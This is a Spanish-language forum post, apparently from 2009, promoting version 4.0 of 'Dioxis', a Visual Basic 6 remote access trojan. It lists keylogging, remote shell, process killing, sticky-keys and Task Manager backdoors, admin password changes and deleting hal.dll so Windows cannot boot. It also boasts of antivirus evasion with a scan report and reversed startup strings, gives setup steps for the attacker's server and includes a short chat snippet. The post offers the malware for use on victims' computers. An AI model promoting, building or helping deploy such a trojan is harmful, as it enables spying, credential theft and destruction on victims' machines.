[VB 6.0] Dioxis 4.0 b 50l3r

Tamaño Cliente: 900 KB
Archivos: Cliente Dioxis
Lenguaje: Visual Basic 6.0
Conexion: Inversa
Tiempo de Reconexion: Personalizada
Tiempo de Refresco de fin de conexion: 1 segundo
Idioma: Español
Puerto usado: Personalizado
Infraestructura: Red Local e internet

Funciones automatizadas:

Ejecucion de:

   * Paint
   * Teclado Universal
   * Buscaminas
   * Solitario
   * Pinball
   * Calculadora
   * Paseo de Win Xp
   * Star Wars
   * Mensajes personalizados
   * Paginas Web

Matanza de Procesos:

   * Messenger
   * Navegadores (Firefox,Iexplorer,Safari, Opera y Google chrome)
   * Explorador de Windows
   * Proceso Personalizado

Creacion de Puertas Traseras:

   * Habilitar terminal server
   * Establecer una cmd en sticky keys (compaginado con ts, tienes el control total del pc)
   * Establecer una cmd en vez del administrador de tareas (para que no pueda ver las tareas)

Sistema:

   * Edicion de la contraseña de administracion a la que se quiera
   * Cierre de Sesion
   * Apagar Pc
   * ELIMINAR HAL.DLL (No se iniciara windows si no es reparado :/ )

Otras Funciones

   * Keylogger
   * Shell Remota
   * Creacion de archivos remotamente

¿Que es Dioxis?

Bueno como prometi, esta es la 4 version de Dioxis, en la que me he centrado en mejorar el keylogger que andaba un poco estropeado

En esta version no he metido ni multiconexion ni transmision de archivos, ya que la conexion me desbarataria toda la estructura del troyano y la transmision iba por interruptores y funcionaba mal y paso de incluir una funcion que ande mal

Dioxis, aun siendo un software simple como pueden ver, tiene bastante potencial y actualmente esta muy escondido de los antivirus, cosa que a la hora de escoger un troyano, buscamos mas

Este software coge el control total o medio parcial de la cpu, podiendo tener una shell remota, manejando el archivo de losg del teclado, creando archivos...etc

Dioxis posee funciones automatizadas para los menos adentrados en este mundillo, estas funciones se dividen en 3 tipos:

Modo funny: El modo divertido ^^,si eres una buena persona y no te atrae la destruccion, cosa que se premia mucho en este mundillo, este modo te ayudara con tus tareas, posee funciones como ejecucion de aplicaciones, ejecutar pelicula de star wars o mandarle mensajes personalizados

Modo Normal: Este modo esta dedicado a la matanza de procesos que corren en el pc remoto y a abrir paginas web o cerrar sesion, un poco mas cruel que el funny mod pero util si quieres pillar contraseñas de msn por ejemplo, cosa muy tipica

Modo Dioxis: El dioxis mod, seria en teoria la forma mas cruel de usar este software, consta ge generar backdoors, apagar el pc, eliminar el hal.dll...etc

He evitado en este modo hacer las cosas crueles ya que este software aun no es detectado ^^ abstenganse gente cruel

El Chat:

He realizado la tarea de crearle un chat debido a que me gusta esta modalidad de hablar con el infectado

El Chat consta de que tu tienes el control de el, y en ningun momento salvo que el host remoto cierre el proceso, se podrá cerrar el chat

El unico que podra cerrar el chat y abrirlo sera el cliente y ademas cuenta con la ayuda de mi muñequito si el usuario intenta cerrarlo ^^

Este es el chat del cliente:

Y este el del servidor

Lo nuevo:

He visto que ha habido gente que no sabia conectarlo, la mayoria porque no habian abierto los puertos de su router o cosas asi basicas, pero me he fijado en un error que tenia el keylogger y que cerraba el servidor si este no estaba coenctado al cliente, ya que el keylogger seguia funcionando y al pulsar una tecla y no poder mandarla al cliente este se cerraba, asi que ese error tan grave fue correjido y ahora podremos disfrutar de nuestro keylogger iniciandolo o deteniendolo desde el mismo keylogger

Ademas el avance mas gordo que ha tenido esta nueva version ha sido que el keylogger ha pasado de funcionar con asquerosos timers y le he aplicado funcionalidad por hooks para que no se pierda ninguna letra por el camino

Demostracion:

¿Detectado?

Código:

File Information
Report Generated: 21.6.2009 at 22.33.13 (GMT 1)
Time for scan: 52 seconds
File Name: ClienteDioxis.exe
File Size: 896 KB
MD5 Hash: DF07F23B686052BD0DD2C2AF44F387E5
SHA1 Hash: 7180D6C2CBE6768911CDFCE7838D6A551988470B
Detection Rate: 1 on 24 (4,16 %)
Status: INFECTED
Antivirus Sig version Engine Version Result
a-squared 19/06/2009 4.0.0.32 -
Avira AntiVir 7.1.4.99 8.1.2.12 -
Avast 090618-0 4.8.1229 -
AVG 270.12.82/2190 8.0.0.0 -
BitDefender 21/06/2009 7.0.0.2555 -
ClamAV 16/06/2009 0.95.1 -
Comodo 1362 3.9 -
Dr.Web 21/06/2009 5.0 -
Ewido 21/06/2009 4.0.0.2 -
F-PROT 6 20090620 4.4.4.56 W32/VB-Remote-TClient-based!Maximus
G DATA 19.5636 2.0.7309.847 -
IkarusT3 16/06/2009 1001044 -
Kaspersky 21/06/2009 8.0.0.357 -
McAfee 16/06/2009 5.1.0.0 -
Malware Hash Registry 21/06/2009 N/A -
NOD32 v3 4174 3.0.677 -
Norman 2009/06/19 5.92.08 -
Panda 21/05/2009 9.5.1.00 -
QuickHeal 20 June, 2009 10.0 -
Solo Antivirus 21/06/2009 8.0 -
Sophos 21/06/2009 4.32.0 -
TrendMicro 197(619700) 1.1-1001 -
VBA32 21/06/2009 3.12.0.300 -
VirusBuster 10.107.15 1.4.3 -

Comentarios Finales:

La estructura de conexion del troyano esta realizada mediante csocketmaster para evitar la compilacion

AHORA PODRAS DISFRUTAR DE TU SERVIDOR COMPLETO SIN NECESIDAD DE COMPILAR NADA ^^

Las cadenas para agregar al inicio estan "Reverse" para evitar la heuristica

La interfaz es amigable y ofrece mucha facilidad

Servidor

Como bien dije y lo vuelvo a repetir, ya que la gente no se leera todo, pocas seran las personas:

el servidor se crea dandole a la mariquita, solo hace falta definir tu ip, puerto y tiempo de reconexion. Si tienes router o firewall no te olvides de abrirle paso al troyano

Dudas sugerencias u otros, comenten ^^ no duele

Private Sub Command1_Click()
If Text2.Text <> "" Then
wsk.SendData ">>|chating>>" & Text2.Text
Text1.Text = Text1.Text & vbCrLf & "Le dices:" & vbCrLf & Text2.Text & vbCrLf
Text2.Text = ""
End If
End Sub